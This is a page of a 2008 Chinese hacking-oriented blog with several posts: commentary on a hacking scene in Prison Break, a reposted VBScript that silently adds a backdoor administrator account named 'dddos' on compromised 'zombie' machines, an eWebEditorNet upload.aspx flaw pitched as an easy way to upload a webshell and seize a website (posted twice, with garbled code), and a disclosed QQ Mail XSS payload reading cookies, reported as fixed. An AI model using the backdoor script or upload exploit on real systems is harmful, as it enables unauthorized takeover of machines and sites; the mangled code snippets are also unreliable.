正在加载...
分页: 7/13 第一页 上页 2 3 4 5 6 7 8 9 10 11 下页 最后页 [ 显示模式: 摘要 | 列表 ]

越狱中的EMAIL帐户破解

[ 2008/09/11 13:18 | by selboo ]

       今天看了越狱第4季的第3集,里面讲到了由于硬盘空间满了,有两封邮件没有接收到。难道国外用的不是POP3么,不能清理磁盘了再去收一次嘛?还是说是用的窃听的方法,sniffer的邮件。
        然后他们就去机房偷邮件,为了进机房耍了个小花招,sara,假装来面试,然后支开前台接待人员,然后悄悄拿走他的门卡,有了门卡,就顺利的进了主机房,由于 michael是建筑工程学的工程师,很熟悉机房的位置,很快就找到了,很专业的样子,从慢镜头中我看到了源代码,似乎是shell的,不过又有C风格的注释,//there's only one matrix: PP还有sql语句,(INSERT INTO)真的很惊讶,美国人的电视剧都这么敬业,不像国产片,总是糊弄人。

点击在新窗口中浏览此图片

      不过里面说邮件在中心主机上有备份,根据我们的知识,难道他们的邮件主机转发邮件的时候都保留了一份作为备份?
如果是postfix,莫非都配置了always_bcc = xxxx@xxx.com
      另外黑客感觉是写了一个shell脚本然后用破解md5口令的方式得到了一个用户的权限,很可能是root用户这样的admin帐户,然后在里面搜索,最后搜到了那两个邮件,然后下载走了。
Tags: ,

转自 http://www.dddos.com

其实很早以前这段代码就已经公布出来了,但最近有人问到,就在这里再发一下吧~
只需要将以下代码保存为vbs文件即可。(依赖于系统中的wscript.exe和cscript.exe,一般的肉鸡都满足咯)
注:用红色标注的为可自行更改的部分,其中dddos为用户名信息,password为密码信息。

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","dddos")
od.SetPassword "password"
od.SetInfo
Set of=GetObject(os&"/dddos",user)
oe.add os&"/dddos"


Tags: ,

eWebEditorNet 漏洞 upload.aspx

[ 2008/09/03 10:32 | by selboo ]

来源:坏狼安全网
eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。
原理:

代码

<form id="post" encType="server">    
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">


只是简单的对ID进行验证,只要构造javascript:lbtnUpload.click();满足条件达到上传木马的效果。成功以后查看源代码

代码

a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>


木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。
Tags:

QQ 邮箱跨站脚本漏洞

[ 2008/08/27 10:35 | by selboo ]

漏洞说明:QQ Mail是Tencent公司提供的webmail服务,你可以使用你的QQ帐户来登陆使用Mail服务,具体的信息可以访问http://mail.qq.com/。但是80sec在QQ Mail里发现存在新的严重跨站脚本漏洞,恶意用户可以通过该漏洞在邮件里伪造登陆表单窃取目标用户的密码以及偷取Cookie以取得其他用户的身份,或者使用ajax等技术读取用户的敏感信息,任何浏览该邮件的用户都存在身份泄漏的风险。

漏洞成因:QQ Mail的Filter在解析Html标签时存在错误,构造畸形的Html标签将绕过过滤,从而在邮件正文里执行任意javascript。QQ Mail对这种类型的标签不做任何过滤,认为是无效html标识符而不做过滤,但是IE却可以正常解析该Html,所以构造如下的畸形Html邮件。

Hello,80sec  </xss style="x:expression(alert(document.cookie))">


将触发Xss漏洞。

漏洞测试:发送如下Html:

Hello,80sec  </xss style="x:expression(alert(document.cookie))">


漏洞状态:

80sec于 2008.8.14发现此漏洞
80sec于 2008.8.14通知官方
官方于 2008.8.26日修复[同时修复几个其他类型的XSS]

本站内容均为原创,转载请务必保留署名与链接!
QQ Mail跨站脚本漏洞:http://www.80sec.com/qqmail-new-xss.html
Tags: , ,

eWebEditorNet的upload.aspx漏洞

[ 2008/08/18 14:07 | by selboo ]

eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。

原理:

代码

<form id="post" encType="server">    
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">

只是简单的对ID进行验证
只要构造javascript:lbtnUpload.click();满足条件
达到上传木马的效果
成功以后查看源代码

代码

a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>
  
木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。
分页: 7/13 第一页 上页 2 3 4 5 6 7 8 9 10 11 下页 最后页 [ 显示模式: 摘要 | 列表 ]